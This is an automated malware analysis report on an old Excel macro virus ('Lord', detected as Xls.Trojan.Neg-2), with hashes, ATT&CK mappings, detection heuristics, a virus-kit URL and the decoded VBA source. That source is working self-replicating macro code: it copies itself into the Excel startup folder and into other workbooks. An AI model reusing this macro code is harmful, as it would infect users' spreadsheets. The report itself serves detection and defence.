Xls.Trojan.Neg-2 Office (OLE) malware analysis — malicious · 697511d87d2ee052

MALICIOUS

Office (OLE)

38.0 KB Created: 1998-04-02 04:13:06 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: 6735eb4eee42ad93b167c501b516da3a SHA-1: 6e8530b7daac5ec3a529bd7669498f88d95cc42e SHA-256: 697511d87d2ee0522f4affd3c21040f2a73bd1f38bab81ae9713d29ab8c7514c

222 Risk Score

Malware Insights

Xls.Trojan.Neg-2 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Excel file containing VBA macros, specifically an Auto_Open macro designed to execute upon opening. The script attempts to establish persistence by saving a copy of itself as 'LORD.XLM' to the user's startup directory and then attempts to infect other workbooks. The embedded URL points to a page associated with the 'Neg' trojan.

Heuristics 5

ClamAV: Xls.Trojan.Neg-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Trojan.Neg-2
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://www.focus-asia.com/home/NoMercyVirusTeam/Neg.html In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3800 bytes
SHA-256: `61d0540d70f843bbf76b6e4a323f24f634d7bfb5164c0867a0142464cdf3fd9f`
Detection ClamAV: Xls.Trojan.Neg-2 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Lord" '------------------------------------------------ 'Generated with NEG !!. Please include this text '------------------------------------------------ 'NEG is Trademark of NoMercy 'http://www.focus-asia.com/home/NoMercyVirusTeam/Neg.html 'VirusName: Lord 'Author: Foxz with NEG 'Module Name: Lord 'Template: LORD.XLM Sub Auto_Open() Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14" On Error Resume Next Application.ScreenUpdating = False Application.DisplayAlerts = False If cek_global() Then GoTo FuckSheet: Else infectglobal End If FuckSheet: Application.OnSheetActivate = "LORD.XLM!Fuck" bye: End Sub Function cek_global() As Boolean Attribute cek_global.VB_ProcData.VB_Invoke_Func = " \n14" cek_global = False For x = 1 To Application.Workbooks.Count If Application.Workbooks(x).Name = "LORD.XLM" Then For y = 1 To Application.Workbooks("LORD.XLM").Modules.Count If Application.Workbooks("LORD.XLM").Modules(y).Name = "Lord" Then cek_global = True End If Next y End If Next x End Function Function infectglobal() Attribute infectglobal.VB_ProcData.VB_Invoke_Func = " \n14" activebook = ActiveWorkbook.Name Workbooks(activebook).SaveCopyAs Application.StartupPath + "\LORD.XLM" Workbooks.Open (Application.StartupPath + "\LORD.XLM") Windows("LORD.XLM").Visible = False Application.Workbooks("LORD.XLM").Save End Function Function inFuckIt() As Boolean Attribute inFuckIt.VB_ProcData.VB_Invoke_Func = " \n14" activebook = ActiveWorkbook.Name inFuckIt = False For y = 1 To Application.Workbooks(activebook).Modules.Count If Application.Workbooks(activebook).Modules(y).Name = "Lord" Then inFuckIt = True End If Next y End Function Sub Fuck() Attribute Fuck.VB_ProcData.VB_Invoke_Func = " \n14" oactivebook = ActiveWorkbook.Name If inFuckIt() Then GoTo bye2 Else End If Application.ScreenUpdating = False Application.Windows("LORD.XLM").Visible = True Workbooks("LORD.XLM").Activate Sheets("Lord").Visible = True Workbooks("LORD.XLM").Sheets("Lord").Copy Before:=Workbooks(oactivebook).Sheets(1) Workbooks(oactivebook).Sheets("Lord").Visible = False Workbooks("LORD.XLM").Sheets("Lord").Visible = False Windows("LORD.XLM").Visible = False bye2: Close End Sub Sub Auto_Close() Attribute Auto_Close.VB_ProcData.VB_Invoke_Func = " \n14" On Error GoTo bye3 Application.DisplayAlerts = False Application.Workbooks("LORD.XLM").Save If Day(Date) = "1" Then MsgBox "Get the best Excel Scanner!!! --NVT98--", 48 Else End If bye3: End Sub 'Thank's for Speading NoMercy Product! Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.